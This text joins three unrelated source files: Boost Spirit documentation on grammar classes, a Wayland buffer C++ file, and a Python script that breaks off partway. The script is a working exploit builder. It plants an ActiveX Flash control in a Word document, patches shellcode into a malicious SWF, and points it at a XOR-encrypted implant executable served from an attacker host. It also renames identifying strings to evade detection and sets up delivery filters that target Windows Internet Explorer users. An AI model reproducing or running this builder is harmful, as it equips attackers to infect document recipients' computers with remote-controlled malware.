<p>The <b>grammar</b> encapsulates a set of rules. The <tt>grammar</tt> class
is a protocol base class. It is essentially an interface contract. The <tt>grammar</tt>
is a template class that is parameterized by its derived class, <tt>DerivedT</tt>,
and its context, <tt>ContextT</tt>. The template parameter ContextT defaults
to <tt>parser_context</tt>, a predefined context. </p>
<p>You need not be concerned at all with the ContextT template parameter unless
you wish to tweak the low level behavior of the grammar. Detailed information
on the ContextT template parameter is provided <a href="indepth_the_parser_context.html">elsewhere</a>.
The <tt>grammar</tt> relies on the template parameter DerivedT, a grammar subclass
to define the actual rules.</p>
<p>Presented below is the public API. There may actually be more template parameters
after <tt>ContextT</tt>. Everything after the <tt>ContextT</tt> parameter should
not be of concern to the client and are strictly for internal use only.</p>
<pre><code><font color="#000000"><span class=identifier> </span><span class=keyword>template</span><span class=special><
</span><span class=keyword>typename </span><span class=identifier>DerivedT</span><span class=special>,
</span><span class=keyword>typename </span><span class=identifier>ContextT </span><span class=special>= </span><span class=identifier>parser_context</span><span class=special><</span><span class=special>> >
</span><span class=keyword>struct </span><span class=identifier>grammar</span><span class=special>;</span></font></code></pre>
<h2>Grammar definition</h2>
<p>A concrete sub-class inheriting from <tt>grammar</tt> is expected to have a
nested template class (or struct) named <tt>definition</tt>:</p>
<blockquote>
<p><img src="theme/bullet.gif" width="13" height="13"> It is a nested template
class with a typename <tt>ScannerT</tt> parameter.<br>
<img src="theme/bullet.gif" width="13" height="13"> Its constructor defines
the grammar rules.<br>
<img src="theme/bullet.gif" width="13" height="13"> Its constructor is passed
in a reference to the actual grammar <tt>self</tt>.<br>
<img src="theme/bullet.gif" width="13" height="13"> It has a member function
named <tt>start</tt> that returns a reference to the start <tt>rule</tt>.</p>
</blockquote>
<h2>Grammar skeleton</h2>
<pre><code><font color="#000000"><span class=special> </span><span class=keyword>struct </span><span class=identifier>my_grammar </span><span class=special>: </span><span class=keyword>public </span><span class=identifier>grammar</span><span class=special><</span><span class=identifier>my_grammar</span><span class=special>>
</span><span class=special>{
</span><span class=keyword>template </span><span class=special><</span><span class=keyword>typename </span><span class=identifier>ScannerT</span><span class=special>>
</span><span class=keyword>struct </span><span class=identifier>definition
</span><span class=special>{
</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=identifier>r</span><span class=special>;
</span><span class=identifier>definition</span><span class=special>(</span><span class=identifier>my_grammar </span><span class=keyword>const</span><span class=special>& </span><span class=identifier>self</span><span class=special>) </span><span class=special>{ </span><span class=identifier>r </span><span class=special>= </span><span class=comment>/*..define here..*/</span><span class=special>; </span><span class=special>}
</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=keyword>const</span><span class=special>& </span><span class=identifier>start</span><span class=special>() </span><span class=keyword>const </span><span class=special>{ </span><span class=keyword>return </span><span class=identifier>r</span><span class=special>; </span><span class=special>}
</span><span class=special>};
</span><span class=special>};</span></font></code></pre>
<p>Decoupling the scanner type from the rules that form a grammar allows the grammar
to be used in different contexts possibly using different scanners. We do not
care what scanner we are dealing with. The user-defined <tt>my_grammar</tt>
can be used with <b>any</b> type of scanner. Unlike the rule, the grammar is
not tied to a specific scanner type. See <a href="faq.html#scanner_business">"Scanner
Business"</a> to see why this is important and to gain further understanding
on this scanner-rule coupling problem.</p>
<h2>Instantiating and using my_grammar</h2>
<p>Our grammar above may be instantiated and put into action:</p>
<pre><code><font color="#000000"><span class=special> </span><span class=identifier>my_grammar </span><span class=identifier>g</span><span class=special>;
</span><span class=keyword>if </span><span class=special>(</span><span class=identifier>parse</span><span class=special>(</span><span class=identifier>first</span><span class=special>, </span><span class=identifier>last</span><span class=special>, </span><span class=identifier>g</span><span class=special>, </span><span class=identifier>space_p</span><span class=special>).</span><span class=identifier>full</span><span class=special>)
</span><span class=identifier>cout </span><span class=special><< </span><span class=string>"parsing succeeded\n"</span><span class=special>;
</span><span class=keyword>else
</span><span class=identifier>cout </span><span class=special><< </span><span class=string>"parsing failed\n"</span><span class=special>;</span></font></code></pre>
<p><tt>my_grammar</tt> <b>IS-A </b>parser and can be used anywhere a parser is
expected, even referenced by another rule:</p>
<pre><code><font color="#000000"><span class=special> </span><span class=identifier>rule</span><span class=special><> </span><span class=identifier>r </span><span class=special>= </span><span class=identifier>g </span><span class=special>>> </span><span class=identifier>str_p</span><span class=special>(</span><span class=string>"cool huh?"</span><span class=special>);</span></font></code></pre>
<table width="80%" border="0" align="center">
<tr>
<td class="note_box"><img src="theme/alert.gif" width="16" height="16"> <b>Referencing
grammars<br>
</b><br>
Like the rule, the grammar is also held by reference when it is placed in
the right hand side of an EBNF expression. It is the responsibility of the
client to ensure that the referenced grammar stays in scope and does not
get destructed while it is being referenced. </td>
</tr>
</table>
<h2><a name="full_grammar"></a>Full Grammar Example</h2>
<p>Recalling our original calculator example, here it is now rewritten using a
grammar:</p>
<pre><code><font color="#000000"><span class=special> </span><span class=keyword>struct </span><span class=identifier>calculator </span><span class=special>: </span><span class=keyword>public </span><span class=identifier>grammar</span><span class=special><</span><span class=identifier>calculator</span><span class=special>>
</span><span class=special>{
</span><span class=keyword>template </span><span class=special><</span><span class=keyword>typename </span><span class=identifier>ScannerT</span><span class=special>>
</span><span class=keyword>struct </span><span class=identifier>definition
</span><span class=special>{
</span><span class=identifier>definition</span><span class=special>(</span><span class=identifier>calculator </span><span class=keyword>const</span><span class=special>& </span><span class=identifier>self</span><span class=special>)
</span><span class=special>{
</span><span class=identifier>group </span><span class=special>= </span><span class=literal>'(' </span><span class=special>>> </span><span class=identifier>expression </span><span class=special>>> </span><span class=literal>')'</span><span class=special>;
</span><span class=identifier>factor </span><span class=special>= </span><span class=identifier>integer </span><span class=special>| </span><span class=identifier>group</span><span class=special>;
</span><span class=identifier>term </span><span class=special>= </span><span class=identifier>factor </span><span class=special>>> </span><span class=special>*((</span><span class=literal>'*' </span><span class=special>>> </span><span class=identifier>factor</span><span class=special>) </span><span class=special>| </span><span class=special>(</span><span class=literal>'/' </span><span class=special>>> </span><span class=identifier>factor</span><span class=special>));
</span><span class=identifier>expression </span><span class=special>= </span><span class=identifier>term </span><span class=special>>> </span><span class=special>*((</span><span class=literal>'+' </span><span class=special>>> </span><span class=identifier>term</span><span class=special>) </span><span class=special>| </span><span class=special>(</span><span class=literal>'-' </span><span class=special>>> </span><span class=identifier>term</span><span class=special>));
</span><span class=special>}
</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=identifier>expression</span><span class=special>, </span><span class=identifier>term</span><span class=special>, </span><span class=identifier>factor</span><span class=special>, </span><span class=identifier>group</span><span class=special>;
</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=keyword>const</span><span class=special>&
</span><span class=identifier>start</span><span class=special>() </span><span class=keyword>const </span><span class=special>{ </span><span class=keyword>return </span><span class=identifier>expression</span><span class=special>; </span><span class=special>}
</span><span class=special>};
</span><span class=special>};</span></font></code></pre>
<p><img src="theme/lens.gif" width="15" height="16"> A fully working example with
<a href="semantic_actions.html">semantic actions</a> can be <a href="../example/fundamental/calc_plain.cpp">viewed
here</a>. This is part of the Spirit distribution. </p>
<table width="80%" border="0" align="center">
<tr>
<td class="note_box"><img src="theme/lens.gif" width="15" height="16"> <b>self</b><br>
<br>
You might notice that the definition of the grammar has a constructor that
accepts a const reference to the outer grammar. In the example above, notice
that <tt>calculator::definition</tt> takes in a <tt>calculator const&
self</tt>. While this is unused in the example above, in many cases, this
is very useful. The self argument is the definition's window to the outside
world. For example, the calculator class might have a reference to some
state information that the definition can update while parsing proceeds
through <a href="semantic_actions.html">semantic actions</a>. </td>
</tr>
</table>
<h2>Grammar Capsules</h2>
<p>As a grammar becomes complicated, it is a good idea to group parts into logical
modules. For instance, when writing a language, it might be wise to put expressions
and statements into separate grammar capsules. The grammar takes advantage of
the encapsulation properties of C++ classes. The declarative nature of classes
makes it a perfect fit for the definition of grammars. Since the grammar is
nothing more than a class declaration, we can conveniently publish it in header
files. The idea is that once written and fully tested, a grammar can be reused
in many contexts. We now have the notion of grammar libraries.</p>
<h2><a name="multithreading"></a>Reentrancy and multithreading</h2>
<p>An instance of a grammar may be used in different places multiple times without
any problem. The implementation is tuned to allow this at the expense of some
overhead. However, we can save considerable cycles and bytes if we are certain
that a grammar will only have a single instance. If this is desired, simply
define <tt>BOOST_SPIRIT_SINGLE_GRAMMAR_INSTANCE</tt> before including any spirit
header files.</p>
<pre><font face="Courier New, Courier, mono"><code><span class="preprocessor"> #define</span></code></font><span class="preprocessor"><code><font face="Courier New, Courier, mono"> </font><tt>BOOST_SPIRIT_SINGLE_GRAMMAR_INSTANCE</tt></code></span></pre>
<p> On the other hand, if a grammar is intended to be used in multithreaded code,
we should then define <tt>BOOST_SPIRIT_THREADSAFE</tt> before including any
spirit header files. In this case it will also be required to link against <a href="http://www.boost.org/libs/thread/doc/index.html">Boost.Threads</a></p>
<pre><font face="Courier New, Courier, mono"><span class="preprocessor"> #define</span></font> <span class="preprocessor"><tt>BOOST_SPIRIT_THREADSAFE</tt></span></pre>
<h2>Using more than one grammar start rule </h2>
<p>Sometimes it is desirable to have more than one visible entry point to a grammar
(apart from the start rule). To allow additional start points, Spirit provides
a helper template <tt>grammar_def</tt>, which may be used as a base class for
the <tt>definition</tt> subclass of your <tt>grammar</tt>. Here's an example:</p>
<pre><code> <span class="comment">// this header has to be explicitly included</span>
<span class="preprocessor">#include</span> <span class="string"><boost/spirit/utility/grammar_def.hpp></span>
</span><span class=keyword>struct </span><span class=identifier>calculator2 </span><span class=special>: </span><span class=keyword>public </span><span class=identifier>grammar</span><span class=special><</span><span class=identifier>calculator2</span><span class=special>>
{
</span> <span class="keyword">enum</span>
{
expression = 0,
term = 1,
factor = 2,
};
<span class=special> </span><span class=keyword>template </span><span class=special><</span><span class=keyword>typename </span><span class=identifier>ScannerT</span><span class=special>>
</span><span class=keyword>struct </span><span class=identifier>definition
</span><span class="special">:</span> <span class="keyword">public</span><span class=identifier> grammar_def</span><span class="special"><</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>>,</span> same<span class="special">,</span> same<span class="special">></span>
<span class=special>{</span>
<span class=identifier>definition</span><span class=special>(</span><span class=identifier>calculator2 </span><span class=keyword>const</span><span class=special>& </span><span class=identifier>self</span><span class=special>)
{
</span><span class=identifier>group </span><span class=special>= </span><span class=literal>'(' </span><span class=special>>> </span><span class=identifier>expression </span><span class=special>>> </span><span class=literal>')'</span><span class=special>;
</span><span class=identifier>factor </span><span class=special>= </span><span class=identifier>integer </span><span class=special>| </span><span class=identifier>group</span><span class=special>;
</span><span class=identifier>term </span><span class=special>= </span><span class=identifier>factor </span><span class=special>>> *((</span><span class=literal>'*' </span><span class=special>>> </span><span class=identifier>factor</span><span class=special>) | (</span><span class=literal>'/' </span><span class=special>>> </span><span class=identifier>factor</span><span class=special>));
</span><span class=identifier>expression </span><span class=special>= </span><span class=identifier>term </span><span class=special>>> *((</span><span class=literal>'+' </span><span class=special>>> </span><span class=identifier>term</span><span class=special>) | (</span><span class=literal>'-' </span><span class=special>>> </span><span class=identifier>term</span><span class=special>));</span>
<span class="keyword">this</span><span class="special">-></span>start_parsers<span class="special">(</span>expression<span class="special">,</span> term<span class="special">,</span> factor<span class="special">);</span>
<span class="special">}</span>
<span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>> </span><span class=identifier>expression</span><span class=special>, </span><span class=identifier>term</span><span class=special>, </span><span class=identifier>factor, group</span><span class=special>;
</span><span class=special> };
};</span></font></code></pre>
<p>The <tt>grammar_def</tt> template has to be instantiated with the types of
all the rules you wish to make visible from outside the <tt>grammar</tt>:</p>
<pre><code><span class=identifier> </span><span class=identifier>grammar_def</span><span class="special"><</span><span class=identifier>rule</span><span class=special><</span><span class=identifier>ScannerT</span><span class=special>>,</span> same<span class="special">,</span> same<span class="special">></span></code> </pre>
<p>The shorthand notation <tt>same</tt> is used to indicate that the same type
be used as specified by the previous template parameter (e.g. <code><tt>rule<ScannerT></tt></code>).
Obviously, <tt>same</tt> may not be used as the first template parameter. </p>
<table width="80%" border="0" align="center">
<tr>
<td class="note_box"> <img src="theme/bulb.gif" width="13" height="18"> <strong>grammar_def
start types</strong><br>
<br>
It may not be obvious, but it is interesting to note that aside from rule<>s,
any parser type may be specified (e.g. chlit<>, strlit<>, int_parser<>,
etc.).</td>
</tr>
</table>
<p>Using the grammar_def class, there is no need to provide a <tt>start()</tt>member
function anymore. Instead, you'll have to insert a call to the <tt>this->start_parsers()</tt>
(which is a member function of the <tt>grammar_def</tt> template) to define
the start symbols for your <tt>grammar</tt>. <img src="theme/note.gif" width="16" height="16">
Note that the number and the sequence of the rules used as the parameters to
the <tt>start_parsers()</tt> function should match the types specified in the
<tt>grammar_def</tt> template:</p>
<pre><code> <span class="keyword">this</span><span class="special">-></span>start_parsers<span class="special">(</span>expression<span class="special">,</span> term<span class="special">,</span> factor<span class="special">);</span></code></pre>
<p> The grammar entry point may be specified using the following syntax:</p>
<pre><code><font color="#000000"><span class=identifier> g</span><span class="special">.</span><span class=identifier>use_parser</span><span class="special"><</span><span class=identifier>N</span><span class=special>>() </span><span class="comment">// Where g is your grammar and N is the Nth entry.</span></font></code></pre>
<p>This sample shows how to use the <tt>term</tt> rule from the <tt>calculator2</tt>
grammar above:</p>
<pre><code><font color="#000000"><span class=identifier> calculator2 g</span><span class=special>;
</span><span class=keyword>if </span><span class=special>(</span><span class=identifier>parse</span><span class=special>(</span><span class=identifier>
first</span><span class=special>, </span><span class=identifier>last</span><span class=special>,
</span><span class=identifier>g</span><span class="special">.</span><span class=identifier>use_parser</span><span class="special"><</span><span class=identifier>calculator2::term</span><span class=special>>(),</span><span class=identifier>
space_p</span><span class=special>
).</span><span class=identifier>full</span><span class=special>)
{
</span><span class=identifier>cout </span><span class=special><< </span><span class=string>"parsing succeeded\n"</span><span class=special>;
}
</span><span class=keyword>else</span> <span class="special">{</span>
<span class=identifier>cout </span><span class=special><< </span><span class=string>"parsing failed\n"</span><span class=special>;
}</span></font></code></pre>
<p>The template parameter for the <tt>use_parser<></tt> template type should
be the zero based index into the list of rules specified in the <tt>start_parsers()</tt>
function call. </p>
<table width="80%" border="0" align="center">
<tr>
<td class="note_box"><img src="theme/note.gif" width="16" height="16"> <tt><strong>use_parser<0></strong></tt><br>
<br>
Note, that using <span class="literal">0</span> (zero) as the template parameter
to <tt>use_parser</tt> is equivalent to using the start rule, exported by
conventional means through the <tt>start()</tt> function, as shown in the
first <tt><a href="grammar.html#full_grammar">calculator</a></tt> sample
above. So this notation may be used even for grammars exporting one rule
through its <tt>start()</tt> function only. On the other hand, calling a
<tt>grammar</tt> without the <tt>use_parser</tt> notation will execute the
rule specified as the first parameter to the <tt>start_parsers()</tt> function.
</td>
</tr>
</table>
<p>The maximum number of usable start rules is limited by the preprocessor constant:</p>
<pre> <span class="identifier">BOOST_SPIRIT_GRAMMAR_STARTRULE_TYPE_LIMIT</span> <span class="comment">// defaults to 3</span></pre>
<table border="0">
<tr>
<td width="10"></td>
<td width="30"><a href="../index.html"><img src="theme/u_arr.gif" border="0"></a></td>
<td width="30"><a href="scanner.html"><img src="theme/l_arr.gif" border="0"></a></td>
<td width="30"><a href="subrules.html"><img src="theme/r_arr.gif" border="0"></a></td>
</tr>
</table>
<br>
<hr size="1">
<p class="copyright">Copyright © 1998-2003 Joel de Guzman<br>
Copyright © 2003-2004 Hartmut Kaiser <br>
<br>
<font size="2">Use, modification and distribution is subject to the Boost Software
License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt) </font> </p>
<p> </p>
</body>
</html>
| {
"pile_set_name": "Github"
} |
// -------------------------------------------------------------------------
// Copyright (C) 2017 BMW Car IT GmbH
// -------------------------------------------------------------------------
// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at https://mozilla.org/MPL/2.0/.
// -------------------------------------------------------------------------
#include "EmbeddedCompositor_Wayland/WaylandBufferResource.h"
namespace ramses_internal
{
WaylandBufferResource::WaylandBufferResource()
{
}
WaylandBufferResource::WaylandBufferResource(wl_resource* resource, bool ownership)
: WaylandResource(resource, ownership)
{
}
void WaylandBufferResource::bufferSendRelease()
{
wl_buffer_send_release(m_resource);
}
int32_t WaylandBufferResource::bufferGetSharedMemoryWidth() const
{
wl_shm_buffer* sharedMemoryBuffer = wl_shm_buffer_get(m_resource);
if (sharedMemoryBuffer)
{
return wl_shm_buffer_get_width(sharedMemoryBuffer);
}
else
{
return 0;
}
}
int32_t WaylandBufferResource::bufferGetSharedMemoryHeight() const
{
wl_shm_buffer* sharedMemoryBuffer = wl_shm_buffer_get(m_resource);
if (sharedMemoryBuffer)
{
return wl_shm_buffer_get_height(sharedMemoryBuffer);
}
else
{
return 0;
}
}
const void* WaylandBufferResource::bufferGetSharedMemoryData() const
{
wl_shm_buffer* sharedMemoryBuffer = wl_shm_buffer_get(m_resource);
if (sharedMemoryBuffer)
{
return wl_shm_buffer_get_data(sharedMemoryBuffer);
}
else
{
return nullptr;
}
}
WaylandBufferResource* WaylandBufferResource::clone() const
{
return new WaylandBufferResource(m_resource, false);
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
import os
import sys
import copy
import json
import glob
import zlib
import random
import shutil
import pylzma
import struct
import argparse
import platform
import tempfile
import urlparse
import subprocess
import ConfigParser
from zipfile import ZipFile
# ------- start of utils subs -------
def random_id(length):
number = '0123456789'
alpha = 'abcdefghijklmnopqrstuvwxyz'
id = ''
for i in range(0, length, 2):
id += random.choice(number)
id += random.choice(alpha)
return id
def four_byte_xor(buf, key):
out = ''
for i in range(0, len(buf)/4):
c = struct.unpack('<I', buf[(i*4):(i*4)+4])[0]
c ^= key
out += struct.pack('<I', c)
reminder = len(buf) % 4
for i in range(len(buf) - reminder, len(buf)):
c = struct.unpack('B', buf[i])[0]
c ^= 0x41
out += struct.pack('B', c)
return out
def byteArray2String(param):
f, tmp = tempfile.mkstemp()
os.close(f)
f = open(tmp, 'wb')
f.write(param)
f.close()
f = open(tmp, 'rb')
result = f.read()
f.close()
try:
os.unlink(tmp)
except WindowsError:
print 'I/O error when deleting {} file'.format(tmp)
return result
# ------- end of utils subs -------
# ------- start of build subs -------
def create_doc(input_docx):
# unpack zip file
if not os.path.exists("tmp"):
os.mkdir("tmp")
myzip = ZipFile(input_docx)
myzip.extractall("tmp")
myzip.close()
# update content types
buff = open("tmp/[Content_Types].xml", 'r').read()
idx = buff.lower().find("<types")
idx2 = buff[idx:].lower().find(">") + 1
buff2 = buff[:idx+idx2]
if buff.lower().find("vnd.ms-office.activex") == -1:
buff2 += '<Default ContentType="application/vnd.ms-office.activeX" Extension="bin"/>'
if buff.lower().find("image/x-wmf") == -1:
buff2 += '<Default ContentType="image/x-wmf" Extension="wmf"/>'
buff2 += '<Override ContentType="application/vnd.ms-office.activeX+xml" PartName="/word/activeX/activeX1.xml"/>'
buff2 += buff[idx+idx2:]
open("tmp/[Content_Types].xml", 'w').write(buff2)
# update rels
buff = open("tmp/word/_rels/document.xml.rels", 'r').read()
idx = buff.lower().find("</relationships>")
buff2 = buff[:idx]
buff2 += '<Relationship Target="activeX/activeX1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Id="rId1000"/><Relationship Target="media/image1000.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId1001"/>'
buff2 += "</Relationships>"
open("tmp/word/_rels/document.xml.rels", 'w').write(buff2)
# update document
buff = open("tmp/word/document.xml", 'r').read()
#idx = buff.lower().find("</w:body")
#idx2 = 0
idx = buff.lower().find("<w:body")
idx2 = buff[idx:].lower().find(">") + 1
buff2 = buff[:idx+idx2]
buff2 += '<w:control w:name="ShockwaveFlash1" r:id="rId1000"/>'
buff2 += buff[idx+idx2:]
open("tmp/word/document.xml", 'w').write(buff2)
if os.path.exists("tmp/word/activeX"):
print "[!!] Unsupported file: contains an ActiveX"
sys.exit(-1);
if not os.path.exists("tmp/word/activeX/"):
shutil.copytree("resources/activeX/", "tmp/word/activeX/")
if not os.path.exists("tmp/word/media/"):
shutil.copytree("resources/media/", "tmp/word/media/")
else:
shutil.copy("resources/media/image1000.wmf", "tmp/word/media/")
'''
params:
- target_directory: exploit files destination folder
- ip: ip hosting exploit files
- scout_name: name of the scout as installed
- scout_input_path: path of the scout provided
- docx: path of the docx provided
- output: docx with the exploit link embedded
- swf_random_name: name of the swf hosted at ip
- exe_random_name: name of the exe(scout) hosted at ip
'''
def edn_build(target_directory, ip, basedir, scout_name, scout_input_path, docx, output_file, swf_random_name, exe_random_name, expiry, validate):
print '[*] Word Exploit:\n target directory: {}\n ip: {}\n basedir: {}\n scout name: {}\n\
scout input: {}\n docx: {}\n output: {}\n swf_random_name: {}\n exe_random_name: {}\n'.format(target_directory, ip, basedir, scout_name, scout_input_path, docx, output_file, swf_random_name, exe_random_name )
# clear tmp in case there're some leftovers
for root, dirs, files in os.walk('tmp'):
for f in files:
os.unlink(os.path.join(root, f))
for d in dirs:
shutil.rmtree(os.path.join(root, d))
# check whether we're regenerating or not
if os.path.exists(os.path.join(target_directory, '.config')):
print '[*] N.B. regenerating an existing exploit'
old_stuff = os.path.join(target_directory, 'instance_{}'.format(random_id(5)))
os.mkdir(old_stuff)
shutil.move(os.path.join(target_directory, 'data'), old_stuff)
for f in glob.glob(os.path.join(target_directory, '*.ini')):
shutil.move(f, old_stuff)
shutil.move(old_stuff, os.getcwd())
os.mkdir(os.path.join(target_directory, 'data'))
create_doc(docx)
# check whether we're regenerating this exploit, i.e. '.config' file exists within the exploit root dir
config_path = os.path.join(target_directory, '.config')
if os.path.exists(config_path):
data = json.load(open(config_path))
swf_url = str(data['url'])
swf_random_name = swf_url[swf_url.rfind('/')+1:]
parsed_url = urlparse.urlparse(swf_url)
ip = parsed_url.scheme + '://' + parsed_url.netloc
basdir = parsed_url.path[1:parsed_url.path.rfind('/')]
else:
#swf_url = ip + '/' + basedir + '/' + swf_random_name
swf_url = ip + basedir + swf_random_name
open(config_path, 'w').write('{{"url": "{}"}}'.format(swf_url))
#exe_url = ip + '/' + basedir + '/' + exe_random_name
exe_url = ip + basedir + exe_random_name
print '[*] exe_url: {}'.format(exe_url)
print '[*] swf_url: {}'.format(swf_url)
scout_name = scout_name
xor_key = random.randint(0xdead, 0xdeadbeef)
# offsets within resources/shellcode
xor_offt = 0x88 * 2
url_offt = xor_offt + (0x4*2)
scout_offt = 0x110 * 2
# offsets within resources/shellcode64
xor_offt64 = 0
url_offt64 = 8
scout_offt64 = 0x88 * 2
# decompress swf
compressed_swf = open("resources/exploit.swf", 'rb').read()
swf_buff = zlib.decompress(compressed_swf[8:])
# replace :)
swf_buff = swf_buff.replace("ht-201", "abc123")
swf_buff = swf_buff.replace("vector-exploit", "pector-isbrovi")
# --- start 32bit ---
stage2_offset = swf_buff.find(b"EFBEADDE")
if stage2_offset == 0:
print "[E] Gadget for shellcode not found"
sys.exit(-1)
print "[*] Gadget for shellcode found @ 0x%x" %(stage2_offset)
swf_bytearray = bytearray(swf_buff)
# replace shellcode 32
shellcode = open("resources/shellcode", 'rb').read()
if len(shellcode) > 5800:
print "[!!] Shellcode too big: 0x%x" % (len(shellcode))
sys.exit(-1)
hex_shellcode = shellcode.encode('hex')
# find mov var, 0xf001f001
# 0xf001f001 -> shellcode will validate CA
# !0xf001f001 -> shellcode will not validate CA
if not validate:
flag = 'c745fc01f001f0'
position = hex_shellcode.find(flag)
if position == -1:
print('[E] could not find validate cert flag')
exit(-1)
hex_shellcode = hex_shellcode.replace(flag, 'c745fceeeeeeee')
for i in range(len(hex_shellcode)):
swf_bytearray[stage2_offset + i] = hex_shellcode[i]
# modify URL 32
hex_url = exe_url.encode('hex') + "0000"
print "[*] Hex URL => %s" %(hex_url)
for i in range(len(hex_url)):
swf_bytearray[stage2_offset + url_offt + i] = hex_url[i]
# modify scout name 32
hex_scout = "5c" + scout_name.encode('hex') + "0000"
print "[*] Scout Name => %s" % (hex_scout)
for i in range(len(hex_scout)):
swf_bytearray[stage2_offset + scout_offt + i] = hex_scout[i]
# modify xor key
hex_xorkey = ("%08x" % xor_key)
print "[*] Hex key => %s" %(hex_xorkey)
swf_bytearray[stage2_offset + xor_offt + 0] = hex_xorkey[6]
swf_bytearray[stage2_offset + xor_offt + 1] = hex_xorkey[7]
swf_bytearray[stage2_offset + xor_offt + 2] = hex_xorkey[4]
swf_bytearray[stage2_offset + xor_offt + 3] = hex_xorkey[5]
swf_bytearray[stage2_offset + xor_offt + 4] = hex_xorkey[2]
swf_bytearray[stage2_offset + xor_offt + 5] = hex_xorkey[3]
swf_bytearray[stage2_offset + xor_offt + 6] = hex_xorkey[0]
swf_bytearray[stage2_offset + xor_offt + 7] = hex_xorkey[1]
# --- end 32bit ---
# --- start 64bit ---
# get offset to shellcode64
stage264_offset = swf_buff.find(b"CAF1ADDE")
if stage264_offset == 0:
print "[!!] Gadget for shellcode64 not found"
sys.exit(-1)
print "[*] Gadget for shellcode found @ 0x%x" %(stage264_offset)
# replace shellcode 64
shellcode64 = open("resources/shellcode64", 'rb').read()
if len(shellcode64) > (5800*2):
print "[!!] Shellcode too big: 0x%x" % (len(shellcode64))
sys.exit(-1)
hex_shellcode64 = shellcode64.encode('hex')
for i in range(len(hex_shellcode64)):
swf_bytearray[stage264_offset + i] = hex_shellcode64[i]
# modify URL 64
hex_url = exe_url.encode('hex') + "0000"
print "[*] Hex URL => %s" %(hex_url)
for i in range(len(hex_url)):
swf_bytearray[stage264_offset + url_offt64 + i] = hex_url[i]
# modify scout name 64
hex_scout = "5c" + scout_name.encode('hex') + "0000"
print "[*] Scout Name => %s" % (hex_scout)
for i in range(len(hex_scout)):
swf_bytearray[stage264_offset + scout_offt64 + i] = hex_scout[i]
# modify xor key 64
hex_xorkey = ("%08x" % xor_key)
print "[*] Hex key => %s" %(hex_xorkey)
swf_bytearray[stage264_offset + xor_offt64 + 0] = hex_xorkey[6]
swf_bytearray[stage264_offset + xor_offt64 + 1] = hex_xorkey[7]
swf_bytearray[stage264_offset + xor_offt64 + 2] = hex_xorkey[4]
swf_bytearray[stage264_offset + xor_offt64 + 3] = hex_xorkey[5]
swf_bytearray[stage264_offset + xor_offt64 + 4] = hex_xorkey[2]
swf_bytearray[stage264_offset + xor_offt64 + 5] = hex_xorkey[3]
swf_bytearray[stage264_offset + xor_offt64 + 6] = hex_xorkey[0]
swf_bytearray[stage264_offset + xor_offt64 + 7] = hex_xorkey[1]
# --- end 64bit ---
# compress swf
uncompressed_len = len(swf_bytearray)
uncompressed_len += len("ZWS\x0d")
uncompressed_len += 4 # + se stessa
print "[*] Uncompressed len: 0x%x" %(uncompressed_len)
lzma_buff = pylzma.compress(byteArray2String(swf_bytearray))
compressed_len = len(lzma_buff) - 5
print "[*] Compressed len: 0x%x" %(compressed_len)
output_buff = "ZWS\x0d"
output_buff += struct.pack("<L", uncompressed_len)
output_buff += struct.pack("<L", compressed_len)
output_buff += lzma_buff
# write swf to disk
open(swf_random_name, 'wb').write(output_buff)
shutil.move(swf_random_name, os.path.join(target_directory, 'data/not_really_empty.swf') )
# modify ole link
ole_link_buff = open("tmp/word/activeX/activeX1.bin", 'rb').read()
ole_link_offt = ole_link_buff.find("h\x00t\x00t\x00p")
print "[*] Offset to first link: 0x%x" %(ole_link_offt)
ole_link2_offt = ole_link_buff.find("h\x00t\x00t\x00p", ole_link_offt+1)
print "[*] Offset to second link: 0x%x" %(ole_link2_offt)
ole_link3_offt = ole_link_buff.find("h\x00t\x00t\x00p", ole_link2_offt+1)
print "[*] Offset to third link: 0x%x" %(ole_link3_offt)
# when the tls cert is not validated, swf is served over plain http
if not validate:
swf_url = swf_url.replace('https', 'http')
swf_url_bytearray = bytearray(swf_url + "\x00\x00")
ole_link_bytearray = bytearray(ole_link_buff)
for i in range(len(ole_link_bytearray)):
if i == ole_link_offt or i == ole_link2_offt or i == ole_link3_offt:
y = 0
for x in range(len(swf_url_bytearray)):
ole_link_bytearray[i+y] = swf_url_bytearray[x]
ole_link_bytearray[i+y+1] = 0x0
y += 2
# dump modified ole link
open("tmp/word/activeX/activeX1.bin", 'wb').write(byteArray2String(ole_link_bytearray))
# create docx
cwd = os.getcwd()
os.chdir(cwd + "/tmp")
os.system('zip -r "../{}" *'.format(os.path.basename(docx) ))
os.chdir(cwd)
# create an archive containing the docx
os.system('zip "{}" "{}"'.format(output_file, os.path.basename(docx)))
os.remove(os.path.basename(docx))
shutil.move(output_file + '.zip', output_file)
# write xored scout
open(exe_random_name, 'wb').write(four_byte_xor(open(scout_input_path, 'rb').read(), xor_key))
shutil.move(exe_random_name, os.path.join(target_directory, 'data/'))
# copy xp filter and empty.swf
shutil.copy('resources/empty.swf', os.path.join(target_directory, 'data/') )
shutil.copy('resources/xp_filter.py', os.path.join(target_directory, 'data/') )
os.chmod(os.path.join(target_directory, 'data/xp_filter.py'), 0755)
# --- generate edn configuration ---
baseconfig = {
"general": { "expiry": 0, "hits": 1 },
"valid": { },
"invalid": {"type": 404},
"filters": { 'platform_description': '/windows/i', 'browser': '/^IE$/' },
}
# swf
swf_config = copy.deepcopy(baseconfig)
swf_config['general']['pos'] = 'first'
swf_config['general']['expiry'] = expiry
swf_config['valid']['type'] = 'exec'
#swf_config['valid']['path'] = './{}'.format(swf_random_name)
swf_config['valid']['path'] = './xp_filter.py'
swf_config['valid']['headers[Content-Type]'] = 'application/x-shockwave-flash'
swf_config['related'] = {}
swf_config['related'][exe_random_name] = '+2min'
write_edn_config(target_directory, swf_random_name, swf_config)
# scout
